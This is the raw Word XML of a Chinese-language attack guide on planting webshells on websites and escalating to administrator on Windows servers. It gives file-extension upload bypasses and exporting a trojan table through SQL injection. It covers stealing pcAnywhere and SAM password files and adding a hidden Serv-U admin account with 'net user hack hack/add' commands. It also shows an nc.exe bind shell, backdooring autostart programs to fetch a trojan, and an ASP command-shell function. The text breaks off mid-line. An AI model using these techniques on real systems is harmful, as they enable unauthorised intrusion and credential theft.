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66" w:rsidRPr="000F1E81" w:rsidRDefault="000A0E66" w:rsidP="000F1E81">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1E81">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>上传的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="000A0E66">
      <w:r w:rsidRPr="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、进入后台直接上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="000A0E66">
      <w:r w:rsidRPr="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、添加上传类型上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>1.加空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>2.asp后缀改为ASA、CER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>3.php后缀改为pl、ASP、ASA、CER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>4.后缀添加未知后缀例如.php改为.php.hack（未知后缀不解析）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRPr="003203B1" w:rsidRDefault="000A0E66" w:rsidP="000A0E66">
      <w:r w:rsidRPr="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、抓包上传（在抓包处修改后缀如上）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRPr="003203B1" w:rsidRDefault="000A0E66" w:rsidP="000A0E66">
      <w:r w:rsidRPr="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、可以利用表单冲突上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="000A0E66">
      <w:r w:rsidRPr="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用代码对文件类型的限制上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如说</w:t>
      </w:r>
      <w:r>
        <w:t>asp字样被去除了，可以改为ASASPP绕过限制，其他的绕过方法需要在实践中摸索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204886" w:rsidRPr="003203B1" w:rsidRDefault="00204886" w:rsidP="000A0E66">
      <w:r w:rsidRPr="00D01EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00204886">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用数据库的压缩功能，一般是在友情链接上面提交的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01EC8" w:rsidRDefault="00D01EC8" w:rsidP="000A0E66">
      <w:r w:rsidRPr="00D01EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>七</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D01EC8" w:rsidRDefault="00D01EC8" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对使用</w:t>
      </w:r>
      <w:r>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库且存在注入点的，知道网站物理路径后通过往S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库写入带木马的表，再将表导出，即可得到webshell（切记事后要删除表）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005336FC" w:rsidRPr="003203B1" w:rsidRDefault="00D01EC8" w:rsidP="000A0E66">
      <w:r w:rsidRPr="00D01EC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>八</w:t>
      </w:r>
      <w:r w:rsidR="005336FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="005336FC" w:rsidRPr="005336FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00EC22DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤不完全写入</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="005336FC" w:rsidRPr="005336FC">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>一句话木马</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000A0E66" w:rsidRDefault="005336FC" w:rsidP="000A0E66">
      <w:r w:rsidRPr="00EC22DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>九</w:t>
      </w:r>
      <w:r w:rsidR="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用一些特殊功能巧妙上传webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B07456" w:rsidRDefault="000A0E66" w:rsidP="003203B1">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份与恢复功能：先把asp木马文件后缀改为gif等无害文件，上传后记住上传路径，然后备份时把路径填上，名称后缀改为asp即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1E9A" w:rsidRDefault="002B7A3C" w:rsidP="000A0E66">
      <w:r w:rsidRPr="002B7A3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>十</w:t>
      </w:r>
      <w:r w:rsidR="000A0E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用上传工具（自行寻找专用上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007577A9" w:rsidRPr="007577A9" w:rsidRDefault="007577A9" w:rsidP="007577A9">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r w:rsidRPr="009E0C37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:t>、如果服务器上有装了</w:t>
      </w:r>
      <w:r w:rsidR="0052328D">
        <w:t>pcA</w:t>
      </w:r>
      <w:r>
        <w:t>nywhere服务端，它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认安装在系统盘的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/</w:t>
      </w:r>
      <w:r w:rsidR="00973655">
        <w:t>目录下，</w:t>
      </w:r>
      <w:r>
        <w:t>先看能否跳转到这个目录，如果能跳转的话，那么就下载*.cif文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>件。用记事本打开</w:t>
      </w:r>
      <w:r>
        <w:t>cif</w:t>
      </w:r>
      <w:r w:rsidR="00973655">
        <w:t>文件，那么</w:t>
      </w:r>
      <w:r>
        <w:t>就得到pcAnywhere的密码了，直接利用它登陆即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02F62" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r w:rsidRPr="009E0C37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:t>、还可以下载服务器的SAM表，其文件路径为系统盘:\WINNT\system32\config\下。如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>果能够跳转到这个目录中，那么就下载文件名为</w:t>
      </w:r>
      <w:r>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:t>的文件到</w:t>
      </w:r>
      <w:r>
        <w:t>本地的计算机中，对于SAM可以利用LC5这个工具破解出用户密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(3)、虚拟主机用的最多的软件应该算是</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>serv-u</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t>工具。</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>serv-u</w:t>
      </w:r>
      <w:r>
        <w:t>也是漏洞出现的非</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常多，所以利用它进行提权是最为常用的方法。先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断服务器中是否安装了</w:t>
      </w:r>
      <w:r>
        <w:t>serv-u，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先看能否跳转到“系统盘</w:t>
      </w:r>
      <w:r>
        <w:t>: \Documents and Settings\All Users\「开始」菜单\程序\”</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个目录中，从这里可以获取很</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多有用的信息。可以看见好多快捷方式，如果安装了</w:t>
      </w:r>
      <w:r>
        <w:t>Serv-U</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:t>，那么也可以看到其快捷方式，</w:t>
      </w:r>
      <w:r>
        <w:t>可以本地查看属性，即查找</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>Serv-U</w:t>
      </w:r>
      <w:r>
        <w:t>的安装路径，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有了</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>Serv-U</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:t>的安装路径，</w:t>
      </w:r>
      <w:r>
        <w:t>就看能否跳转到这个安装路径中。</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果可以跳转，跳转成功之后。再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>serv-u</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A02F62">
        <w:t>servvDaemon.ini</w:t>
      </w:r>
      <w:r>
        <w:t>是否可写，如</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>果可写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以很快得到管理员的权限了。打开</w:t>
      </w:r>
      <w:r>
        <w:t>servvDaemon.ini</w:t>
      </w:r>
      <w:r w:rsidR="0095361C">
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:t>在[Domain]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一栏下加上</w:t>
      </w:r>
      <w:r>
        <w:t>user9=[hack|1|0，其中数字</w:t>
      </w:r>
      <w:r w:rsidR="004A0AC8">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>可以更换，然后在后面加上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>[USER=hack|1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>password=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>HomeDir=c:\winnt\systam32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Timeout=60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Maintenace=system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Accessl=c:\winnt\system32\RWAMELCDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SKETValues=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4FED" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存后用</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:t>客户端登录，用户名为cnnsafe，密码为空，然后执行quote site</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>execnet user hack hack/add和</w:t>
      </w:r>
      <w:r w:rsidR="00F82B90">
        <w:t>quote site exec</w:t>
      </w:r>
      <w:r>
        <w:t>net localgranp administrators hack/add，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就得到管理员权限了。如果</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>ServvDaemon.ini</w:t>
      </w:r>
      <w:r>
        <w:t>文件不可写，我们还可以用</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>serv-v</w:t>
      </w:r>
      <w:r>
        <w:t>的本地溢出漏洞提权。找个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行的目录，上传我们的提权工具</w:t>
      </w:r>
      <w:r>
        <w:t>su-exe，然后到</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>wscriptshell</w:t>
      </w:r>
      <w:r>
        <w:t>中执行，执行成功</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>后我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>们就可以得到服务器权限了。比如我们利用</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>Serv-u Ftp Server</w:t>
      </w:r>
      <w:r>
        <w:t>本地权限提升漏洞：因为很多主机的“系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘</w:t>
      </w:r>
      <w:r>
        <w:t>:\Documents and Settings\All Users\ Documents”目录以及下边几个子目录Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有设置权限，导致可以在这个目录上传并运行</w:t>
      </w:r>
      <w:r>
        <w:t>Exp. 因此我们直接上传了serv-u local</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t>和nc, 并且把</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>serv-u</w:t>
      </w:r>
      <w:r>
        <w:t>的本地提升权限的名字命名为</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>su.exe</w:t>
      </w:r>
      <w:r>
        <w:t>文件就放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>C:\Documents and Settings\All Users\ Documents”, 然后我们用</w:t>
      </w:r>
      <w:r w:rsidR="004B4FED">
        <w:t>su.exe</w:t>
      </w:r>
      <w:r>
        <w:t>直接建立用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:t>,也可以反弹一个</w:t>
      </w:r>
      <w:r w:rsidR="0039628E">
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>过来的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立用户</w:t>
      </w:r>
      <w:r>
        <w:t>: serv-u.exe "cmd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&gt;USER xl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&gt;PASS 111111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r>
        <w:t>shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(4)、查找con</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>config ,pass</w:t>
      </w:r>
      <w:r>
        <w:t>这类型的文件看能否得到</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>的相关密码，可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有所收获等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(5)、先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件，比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如诺顿、金山、瑞星、</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>WinRAR</w:t>
      </w:r>
      <w:r>
        <w:t>甚至</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>QQ</w:t>
      </w:r>
      <w:r>
        <w:t>之类的，是否可以写，如果可以就修改其程序，绑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定一个批处理或者</w:t>
      </w:r>
      <w:r>
        <w:t>VBS，里面写入我们的木马，然后还是等待服务器重启。当重启的时我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的批处理或</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>VBS</w:t>
      </w:r>
      <w:r w:rsidR="003C7D29">
        <w:t>也会被执行，那么</w:t>
      </w:r>
      <w:r w:rsidR="00863BF2">
        <w:t>它就会去下载</w:t>
      </w:r>
      <w:r w:rsidR="000C743E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r w:rsidR="00863BF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备好的</w:t>
      </w:r>
      <w:r>
        <w:t>的木马，进而控制服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>(6)、很多有经验的管理员，它会将cmd.exe、</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>net.exe</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>net1.exe</w:t>
      </w:r>
      <w:r>
        <w:t>都给删除。那么我们得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到了</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:t>也无法执行命令，这对我们提权是一个很大的阻碍。所以我们要把cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传到服务器中去，然后调用上传的</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>CMD</w:t>
      </w:r>
      <w:r>
        <w:t>来执行命令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:t>提供的上传功能上传一个</w:t>
      </w:r>
      <w:r w:rsidR="00F076D4">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:t>（默认情况下在WIN\system32\cmd.exe）到</w:t>
      </w:r>
      <w:r w:rsidR="0041561B">
        <w:t>WEBSHELL</w:t>
      </w:r>
      <w:r>
        <w:t>目录（其它目录也行，把上传以后的</w:t>
      </w:r>
      <w:r w:rsidR="0041561B">
        <w:t>CMD.exe</w:t>
      </w:r>
      <w:r>
        <w:t>绝对路</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>径</w:t>
      </w:r>
      <w:r w:rsidR="0041561B">
        <w:t>COPY</w:t>
      </w:r>
      <w:r>
        <w:t>出来）。然后修改修改</w:t>
      </w:r>
      <w:r w:rsidR="0041561B">
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:t>找到调用</w:t>
      </w:r>
      <w:r w:rsidR="0041561B">
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:t>的代码，调用代码如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>_code cellSpacing=1 cellPadding=0 width="90%" border=0&gt; Function CmdShell()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>If Request("cmd")&lt;&gt;"" Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>DefCmd = Request("cmd")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>Else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>DefCmd = "Dir "&amp;Session("FolderPath")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=SI&amp;""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>SI=SI&amp;""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&lt;br&gt;　SI=SI&amp;server.createobject("wscript.shell").exec("cmd.exe /c "&amp;DefCmd).st</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>dout.readall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B304D" w:rsidRDefault="006B304D" w:rsidP="006B304D">
      <w:r>
        <w:t>&lt;br&gt;　SI=SI&amp;Chr(13)&amp;"Rar 命令行压缩示例：c:\progra~1\winrar\rar.exe a d:\web\te</w:t>
